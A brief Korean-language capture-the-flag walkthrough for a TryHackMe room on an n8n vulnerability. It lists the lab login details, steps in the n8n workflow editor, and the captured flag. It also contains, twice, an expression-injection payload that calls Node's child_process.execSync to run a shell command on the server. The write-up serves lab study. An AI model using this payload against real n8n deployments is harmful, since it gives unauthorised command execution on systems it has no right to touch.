
룸에 대한 보조 방법론: https://tryhackme.com/room/n8ncve202568613
플레이어: J4ck3LSyN
호스트: ...
사용자명: [email protected]
비밀번호: Try12345!
페이로드: {{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}
페이로드 2: {{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}
Start NewAdd First Step을 선택하고, 오른쪽 사이드바를 열어 Manual Trigger를 추가합니다.Set Fields 옵션을 추가합니다.pwn과 페이로드를 추가합니다.cat flag.txt 실행으로 변경 - 플래그: THM{n8n_exposed_workflow}